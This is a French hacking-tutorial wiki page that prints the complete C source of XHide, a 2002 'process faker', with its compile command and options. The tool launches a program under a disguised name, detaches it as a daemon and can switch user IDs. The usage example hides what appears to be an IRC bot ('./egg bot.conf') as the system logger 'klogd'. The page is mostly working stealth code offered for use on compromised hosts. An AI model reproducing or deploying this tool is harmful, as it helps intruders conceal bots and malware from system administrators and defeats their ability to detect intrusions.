Outils pour utilisateurs

Outils du site


tuto:hacking:process_faker:process_faker_-_xhide

xhide

Fichier xhide.c

gcc xhide.c -o xhide
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>
#include <pwd.h>
#include <grp.h>
 
 
void usage(char *progname);
 
 
int changeown (char *str)
{
char user[256], *group;
struct passwd *pwd;
struct group *grp;
uid_t uid;
gid_t gid;
 
  memset(user, '\0', sizeof(user));
  strncpy(user, str, sizeof(user));
 
  for (group = user; *group; group++)
       if (*group == ':')
       {
                   *group = '\0';
                   group++;
                   break;
       }
                
  if (pwd = getpwnam(user)) 
  {
                uid = pwd->pw_uid;
                gid = pwd->pw_gid;
  } else uid = (uid_t) atoi(user);
 
  if (*group)
                if (grp = getgrnam(group)) gid = grp->gr_gid;
                else gid = (gid_t) atoi(group);
 
  if (setgid(gid)) {
                perror("Error: Can't set GID");
                return 0;
  }
 
  if (setuid(uid))
  {
                perror("Error: Can't set UID");
                return 0;
  }
 
  return 1;
 
}
 
char *fullpath(char *cmd)
{
                char *p, *q, *filename;
                struct stat st;
 
                if (*cmd == '/')
                                return cmd;
 
                filename = (char *) malloc(256);
                if  (*cmd == '.')
                                if (getcwd(filename, 255) != NULL)
                                {
                                                strcat(filename, "/");
                                                strcat(filename, cmd);
                                                return filename;
                                }
                                else
                                                return NULL;
 
                for (p = q = (char *) getenv("PATH"); q != NULL; p = ++q)
                {
                                if (q = (char *) strchr(q, ':'))
                                                *q = (char) '\0';
 
                                snprintf(filename, 256, "%s/%s", p, cmd);
 
                                if (stat(filename, &st) != -1
                                    && S_ISREG(st.st_mode)
                                    && (st.st_mode&S_IXUSR || st.st_mode&S_IXGRP || st.st_mode&S_IXOTH))
                                                return filename;
 
                                if (q == NULL)
                                                break;
                }
 
                free(filename);
                return NULL;
}
 
void
usage(char *progname)
{
    fprintf(stderr, "XHide - Process Faker, by Schizoprenic "
                    "Xnuxer Research (c) 2002\n\nOptions:\n"
                    "-s string\tFake name process\n"
                    "-d\t\tRun aplication as daemon/system (optional)\n" 
                    "-u uid[:gid]\tChange UID/GID, use another user (optional)\n" 
                    "-p filename\tSave PID to filename (optional)\n\n"
                    "Example: %s -s \"klogd -m 0\" -d -p test.pid ./egg bot.conf\n\n",progname);
    exit(1);
}
 
 
int main(int argc,char **argv)
{
char c;
char fake[256];
char *progname, *fakename;
char *pidfile, *fp;
char *execst;
FILE *f;
int runsys=0, null;
int j,i,n,pidnum;
char **newargv;
 
  progname = argv[0];
  if(argc<2) usage(progname);
 
  for (i = 1; i < argc; i++)
  {
     if (argv[i][0] == '-')
                switch (c = argv[i][1])
                {
                case 's': fakename = argv[++i]; break;
        case 'u': changeown(argv[++i]); break; 
                case 'p': pidfile = argv[++i]; break;
        case 'd': runsys = 1; break;
                default:  usage(progname); break;
     }
     else break;
  }
 
  if (!(n = argc - i) || fakename == NULL) usage(progname);
 
  newargv = (char **) malloc(n * sizeof(char **) + 1);
  for (j = 0; j < n; i++,j++) newargv[j] = argv[i];
  newargv[j] = NULL;
 
  if ((fp = fullpath(newargv[0])) == NULL) { perror("Full path seek"); exit(1); }
  execst = fp;
 
  if (n > 1)
  {
                memset(fake, ' ', sizeof(fake) - 1);
                fake[sizeof(fake) - 1] = '\0';
                strncpy(fake, fakename, strlen(fakename));
                newargv[0] = fake;
  }
  else newargv[0] = fakename;
 
  if (runsys) 
  {
                if ((null = open("/dev/null", O_RDWR)) == -1)
                {
                                perror("Error: /dev/null");
                                return -1;
                }
 
                switch (fork())
                {
                                case -1:
                                                perror("Error: FORK-1");
                                                return -1;
                                case  0:
                                                setsid();
                                                switch (fork())
                {
                                case -1:
                                                perror("Error: FORK-2");
                                                return -1;
                                case  0:
                                                umask(0);
                                                close(0);
                                                close(1);
                                                close(2);
                                                dup2(null, 0);
                                                dup2(null, 1);
                                                dup2(null, 2);
                                                break;
                                default:
                                                return 0;
                }
                                break;
                                default:
                                return 0;
                }
  }
 
  waitpid(-1, (int *)0, 0);       
  pidnum = getpid();
 
  if (pidfile != NULL && (f = fopen(pidfile, "w")) != NULL)
  {
     fprintf(f, "%d\n", pidnum);
     fclose(f);
  }
 
  fprintf(stderr,"==> Fakename: %s PidNum: %d\n",fakename,pidnum); 
  execv(execst, newargv);
  perror("Couldn't execute");
  return -1;
 
}

Options:

  • -s string Fake name process
  • -d Run aplication as daemon/system (optional)
  • -u uid[:gid] Change UID/GID, use another user (optional)
  • -p filename Save PID to filename (optional)
./xhide -s "klogd -m 0" -d -p test.pid ./egg bot.conf
tuto/hacking/process_faker/process_faker_-_xhide.txt · Dernière modification : 2010/11/07 22:00 de root